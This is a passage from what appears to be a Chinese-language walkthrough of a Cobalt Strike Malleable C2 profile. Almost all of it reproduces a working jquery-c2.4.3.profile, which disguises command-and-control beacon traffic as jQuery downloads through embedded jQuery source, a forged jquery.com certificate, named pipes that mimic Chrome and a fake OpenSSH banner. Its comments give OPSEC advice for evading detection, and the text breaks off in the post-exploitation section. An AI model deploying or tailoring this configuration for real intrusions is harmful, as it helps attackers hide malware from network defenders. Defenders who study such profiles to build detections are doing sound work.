cobalt strike profile

cobalt strike 配置解读

  • 此处以最新版 jquery-c2.4.3.profile 文件为例进行解析

  • 适用于 Cobalt Strike 4.3 版本,其他版本会另行标注

  • cobalt strike 4.3 官方文档:https://cobaltstrike.com/downloads/csmanual43.pdf

  • 样例

# Malleable C2 Profile
# Version: CobaltStrike 4.3
# File: jquery-c2.4.3.profile
# Description: 
#    c2 profile attempting to mimic a jquery.js request
#    uses signed certificates
#    or self-signed certificates
# Authors: @joevest, @andrewchiles, @001SPARTaN 

################################################
## Tips for Profile Parameter Values
################################################
## 1st, RTFM
## https://cobaltstrike.com/downloads/csmanual43.pdf
##
## Parameter Values
## Enclose parameter in Double quote, not single
##      set useragent "SOME AGENT";   GOOD
##      set useragent 'SOME AGENT';   BAD

## Some special characters do not need escaping 
##      prepend "!@#$%^&*()";

## Semicolons are ok
##      prepend "This is an example;";

## Escape Double quotes
##      append "here is \"some\" stuff";

## Escape Backslashes 
##      append "more \\ stuff";

## HTTP Values
## Program .http-post.client must have a compiled size less than 252 bytes.

################################################
## Profile Name
################################################
## Description:
##    The name of this profile (used in the Indicators of Compromise report)
## Defaults:
##    sample_name: My Profile
## Guidelines:
##    - Choose a name that you want in a report
set sample_name "jQuery CS 4.3 Profile";

################################################
## Sleep Times
################################################
## Description:
##    Time between Beacon check-ins
## Defaults:
##    sleeptime: 60000
##    jitter: 0
## Guidelines:
##    - Beacon Timing in milliseconds (1000 = 1 sec)
set sleeptime "45000";         # 45 Seconds
#set sleeptime "300000";       # 5 Minutes
#set sleeptime "600000";      # 10 Minutes
#set sleeptime "900000";      # 15 Minutes
#set sleeptime "1200000";      # 20 Minutes
#set sleeptime "1800000";      # 30 Minutes
#set sleeptime "3600000";      # 1 Hours
set jitter    "37";            # % jitter

################################################
##  Server Response Size jitter
################################################
##  Description:
##   Append a random-length string (up to the data_jitter value) to http-get and http-post server output.
set data_jitter "100";          

################################################
##  HTTP Client Header Removal
################################################
##  Description:
##      Global option to force Beacon's WinINet to remove specified headers late in the HTTP/S transaction process.
## Value:
##      headers_remove              Comma-separated list of HTTP client headers to remove from Beacon C2.
# set headers_remove "Strict-Transport-Security, header2, header3";

################################################
## Beacon User-Agent
################################################
## Description:
##    User-Agent string used in HTTP requests, CS versions < 4.2 approx 128 max characters, CS 4.2+ max 255 characters
## Defaults:
##    useragent: Internet Explorer (Random)
## Guidelines
##    - Use a User-Agent value that fits with your engagement
##    - useragent is limited to 128 chars before CS 4.2 and to 255 chars from CS 4.2 on (see Description above)
## IE 10
# set useragent "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; InfoPath.3; .NET CLR 3.1.40767; Trident/6.0; en-IN)";
## MS IE 11 User Agent
set useragent "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";

################################################
## SSL CERTIFICATE
################################################
## Description:
##    Signed or self-signed TLS/SSL certificate used for C2 communication using an HTTPS listener
## Defaults:
##    All certificate values are blank
## Guidelines:
##    - Best Option - Use a certificate signed by a trusted certificate authority
##    - Ok Option - Create your own self signed certificate
##    - Option - Set self-signed certificate values
https-certificate {
   
    
    ## Option 1) Trusted and Signed Certificate
    ## Use keytool to create a Java Keystore file. 
    ## Refer to https://www.cobaltstrike.com/help-malleable-c2#validssl
    ## or https://github.com/killswitch-GUI/CobaltStrike-ToolKit/blob/master/HTTPsC2DoneRight.sh
   
    ## Option 2) Create your own Self-Signed Certificate
    ## Use keytool to import your own self signed certificates

    #set keystore "/pathtokeystore";
    #set password "password";

    ## Option 3) Cobalt Strike Self-Signed Certificate
    set C   "US";
    set CN  "jquery.com";
    set O   "jQuery";
    set OU  "Certificate Authority";
    set validity "365";
}

################################################
## TCP Beacon
################################################
## Description:
##    TCP Beacon listen port
##     - https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/
##     - https://www.cobaltstrike.com/help-tcp-beacon
##    TCP Frame Header
##     - Added in CS 4.1, prepend header to TCP Beacon messages
## Defaults:
##    tcp_port: 4444
##    tcp_frame_header: N\A
## Guidelines
##    - OPSEC WARNING!!!!! The default port is 4444. This is bad. You can change it dynamically, but the port set in the profile will always be used first before switching to the dynamic port.
##    - Use a port other than the default. Choose something not in use.
##    - Using a port greater than 1024 is generally a good idea
set tcp_port "42585";
set tcp_frame_header "\x80";

################################################
## SMB beacons
################################################
## Description:
##    Peer-to-peer beacon using SMB for communication
##    SMB Frame Header
##     - Added in CS 4.1, prepend header to SMB Beacon messages
## Defaults:
##    pipename: msagent_##
##    pipename_stager: status_##
##    smb_frame_header: N\A
## Guidelines:
##    - Do not use an existing named pipe; Beacon doesn't check for conflicts!
##    - the ## is replaced with a number unique to a teamserver     
## ---------------------
set pipename         "mojo.5688.8052.183894939787088877##"; # Common Chrome named pipe
set pipename_stager  "mojo.5688.8052.35780273329370473##"; # Common Chrome named pipe
set smb_frame_header "\x80";

################################################
## DNS beacons
################################################
## Description:
##    Beacon that uses DNS for communication
## Defaults:
##    dns_idle: 0.0.0.0
##    dns_max_txt: 252
##    dns_sleep: 0
##    dns_stager_prepend: N/A
##    dns_stager_subhost: .stage.123456.
##    dns_ttl: 1
##    maxdns: 255
##    beacon: N/A
##    get_A:  cdn.
##    get_AAAA: www6.
##    get_TXT: api.
##    put_metadata: www.
##    put_output: post.
##    ns_response: drop
## Guidelines:
##    - DNS beacons generate a lot of DNS requests. DNS beacons are best used as low-and-slow backup C2 channels

dns-beacon {
   
    # Options moved into "dns-beacon" group in version 4.3
    set dns_idle           "74.125.196.113"; #google.com (change this to match your campaign)
    set dns_max_txt        "252";
    set dns_sleep          "0"; #    Force a sleep prior to each individual DNS request. (in milliseconds)
    set dns_ttl            "5";
    set maxdns             "255";
    set dns_stager_prepend ".resources.123456.";
    set dns_stager_subhost ".feeds.123456.";

    # DNS subhosts override options, added in version 4.3
    set beacon           "a.bc.";
    set get_A            "b.1a.";
    set get_AAAA         "c.4a.";
    set get_TXT          "d.tx.";
    set put_metadata     "e.md.";
    set put_output       "f.po.";
    set ns_response      "zero";

}


################################################
## SSH beacons
################################################
## Description:
##    Peer-to-peer SSH pseudo-Beacon for lateral movement
##    ssh_banner
##    - Added in Cobalt Strike 4.1, changes client SSH banner
## Defaults:
##    ssh_banner: Cobalt Strike 4.2
set ssh_banner        "OpenSSH_7.4 Debian (protocol 2.0)";
set ssh_pipename      "wkssvc##";


################################################
## Staging process
################################################
## OPSEC WARNING!!!! Staging has serious OPSEC issues. It is recommended to disable staging and use stageless payloads
## Description:
##    Malleable C2's http-stager block customizes the HTTP staging process
## Defaults:
##    uri_x86 Random String
##    uri_x64 Random String
##    HTTP Server Headers - Basic HTTP Headers
##    HTTP Client Headers - Basic HTTP Headers
## Guidelines:
##    - Add customize HTTP headers to the HTTP traffic of your campaign
##    - Only specify the `Host` header when performing domain fronting. Be aware of HTTP proxies rewriting your request per RFC2616 Section 14.23
##      - https://blog.cobaltstrike.com/2017/02/06/high-reputation-redirectors-and-domain-fronting/
##    - Note: Data transform language not supported in http staging (mask, base64, base64url, etc)

#set host_stage "false"; # Do not use staging. Must use stageless payloads, now the default for Cobalt Strike built-in processes
set host_stage "true"; # Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers.set

http-stager {
     
    set uri_x86 "/jquery-3.3.1.slim.min.js";
    set uri_x64 "/jquery-3.3.2.slim.min.js";

    server {
   
        header "Server" "NetDNA-cache/2.2";
        header "Cache-Control" "max-age=0, no-cache";
        header "Pragma" "no-cache";
        header "Connection" "keep-alive";
        header "Content-Type" "application/javascript; charset=utf-8";
        output {
   
            ## The javascript was changed.  Double quotes and backslashes were escaped to properly render (Refer to Tips for Profile Parameter Values)
            # 2nd Line            
            prepend "!function(e,t){\"use strict\";\"object\"==typeof module&&\"object\"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error(\"jQuery requires a window with a document\");return t(e)}:t(e)}(\"undefined\"!=typeof window?window:this,function(e,t){\"use strict\";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return\"function\"==typeof t&&\"number\"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement(\"script\");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+\"\":\"object\"==typeof e||\"function\"==typeof e?l[c.call(e)]||\"object\":typeof e}var b=\"3.3.1\",w=function(e,t){return new w.fn.init(e,t)},T=/^[\\s\\uFEFF\\xA0]+|[\\s\\uFEFF\\xA0]+$/g;w.fn=w.prototype={jquery:\"3.3.1\",constructor:w,length:0,toArray:function(){return o.call(this)},get:function(e){return null==e?o.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=w.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return w.each(this,e)},map:function(e){return this.pushStack(w.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(o.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:function(){return this.prevObject||this.constructor()},push:s,sort:n.sort,splice:n.splice},w.extend=w.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for(\"boolean\"==typeof a&&(l=a,a=arguments[s]||{},s++),\"object\"==typeof a||g(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in 
e)n=a[t],a!==(r=e[t])&&(l&&r&&(w.isPlainObject(r)||(i=Array.isArray(r)))?(i?(i=!1,o=n&&Array.isArray(n)?n:[]):o=n&&w.isPlainObject(n)?n:{},a[t]=w.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},w.extend({expando:\"jQuery\"+(\"3.3.1\"+Math.random()).replace(/\\D/g,\"\"),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||\"[object Object]\"!==c.call(e))&&(!(t=i(e))||\"function\"==typeof(n=f.call(t,\"constructor\")&&t.constructor)&&p.call(n)===d)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e){m(e)},each:function(e,t){var n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var 
n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r";
            # 1st Line
            prepend "/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */";
            append "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});";
            print;
        }
    }

    client {
   
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Accept-Language" "en-US,en;q=0.5";
        #header "Host" "code.jquery.com";
        header "Referer" "http://code.jquery.com/";
        header "Accept-Encoding" "gzip, deflate";
    }
}

################################################
## Post Exploitation
################################################
## Description:
##    Controls post-exploitation jobs, including default x86/x64 program to open and inject shellcode into, AMSI bypass for execute-assembly, powerpick, and psinject
##    https://www.cobaltstrike.com/help-malleable-postex
## Values:
##    spawnto_x86       %windir%\\syswow64\\rundll32.exe
##    spawnto_x64       %windir%\\sysnative\\rundll32.exe
##    obfuscate         false                                   CS 3.14 - Scrambles the content of the post-ex DLLs and settles the post-ex capability into memory in a more OPSEC-safe way
##    pipename          postex_####, windows\\pipe_##           CS 4.2 - Change the named pipe names used, by post-ex DLLs, to send output back to Beacon. Thi